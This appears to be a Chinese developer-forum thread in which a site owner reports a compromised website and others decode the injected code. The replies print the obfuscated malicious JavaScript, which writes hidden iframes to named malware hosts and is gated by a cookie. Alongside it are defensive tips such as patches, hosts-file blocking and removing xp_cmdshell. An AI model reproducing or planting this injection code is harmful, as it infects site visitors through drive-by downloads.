网站被挂马了。。。大侠帮帮。。

a .a 
lai ren a 

解决方案 »

  1.   

    写成ascii了
    原文:
    <script src=http://OffIce.FAQServ.CoM/FAQ.js>
      

  2.   

    JavaScript执行16进制时会自行转换为对应字符。
      

  3.   

    这个我遇到过,你要是找到它的连接登进去看一下,非把你吓死不可,啥子功能都有,就连你的服务器文件,数据库都可以删除,想干吗干吗!我当时狂看IIS日志,才找到木马文件所在,将文件清了就可以了。不过,你网站肯定有漏洞,还是要把洞补了才得行!
      

  4.   

    很简单,不让你直接看到他的地址而以。
    做个转换即可:<script type="text/javascript"> 
        
        var url = "\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"; 
        alert(decodeURI(url));
        
        </script> 
      

  5.   


    汗eval("\166\141\162\40\124\150\145\156\40\75\40\156\145\167\40\104\141\164\145\50\51\73\15\12\124\150\145\156\56\163\145\164\124\151\155\145\50\124\150\145\156\56\147\145\164\124\151\155\145\50\51\40\53\40\63\60\52\66\60\52\61\60\60\60\40\51\73\40\15\12\166\141\162\40\143\157\157\153\151\145\123\164\162\151\156\147\40\75\40\156\145\167\40\123\164\162\151\156\147\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\51\73\15\12\166\141\162\40\143\157\157\153\151\145\110\145\141\144\145\162\40\75\40\47\141\153\170\170\47\40\73\15\12\166\141\162\40\142\145\147\151\156\120\157\163\151\164\151\157\156\40\75\40\143\157\157\153\151\145\123\164\162\151\156\147\56\151\156\144\145\170\117\146\50\143\157\157\153\151\145\110\145\141\144\145\162\51\73");
    if (beginPosition == -1)
       {
       document.write('<iframe height="0" frameborder="1" src="http://www.59.vc/page/add_54738542.htm" width="10" ></iframe>');
       document.write('<iframe height="0" frameborder="1" src="http://office.faqserv.com/faq.htm" width="10" ></iframe>');
       document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=/";
       }
      

  6.   

    var Then = new Date(); Then.setTime(Then.getTime() + 30*60*1000 ); var cookieString = new String(document.cookie); var cookieHeader = 'akxx' ; var beginPosition = cookieString.indexOf(cookieHeader); if (beginPosition == -1) 
       { 
       document.write(' <iframe height="0" frameborder="1" src="http://www.59.vc/page/add_54738542.htm" width="10" > </iframe> '); 
       document.write(' <iframe height="0" frameborder="1" src="http://office.faqserv.com/faq.htm" width="10" > </iframe> '); 
       document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=/"; 
       }
      

  7.   

    99% 是SqlServer 招惹的。
     
    执行
     Use Master
               exec sp_dropextendedproc 'xp_cmdshell'
               Go数据库专心作数据库,不要控制windows。
      

  8.   

    js木马,系统要注意打上ms06-014、ms07-17补丁
    删除后不再出现最好,呵呵。
    有时要防止局域网内其他中木马的机器再次进行感染,可通过arp防火墙禁止。暂时可以在 hosts文件中加入如下内容就可以屏蔽文件中定义的对应的网址。 (文件位置C:\WINDOWS\system32\drivers\etc 可以用记事本打开)
    127.0.0.1 localhost 
    127.0.0.1 www.59.vc  
    127.0.0.1 59.vc 
    127.0.0.1 OffIce.FAQServ.com  
    127.0.0.1 FAQServ.com 
    127.0.0.1 www.FAQServ.com 
    进行屏蔽
      

  9.   

    这问题很严重,很明显是网站存在漏洞而被攻击了,若需要安全技术服务请联系EMAIL & MSN:[email protected], 7X24 为您的网站保驾护航。
      

  10.   

    安全第一啊.不过你连"javascript"字符串都没过滤,最起码的安全工作都没有做啊.
      

  11.   

    http://OffIce.FAQServ.CoM/FAQ.js 
      

  12.   

    http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html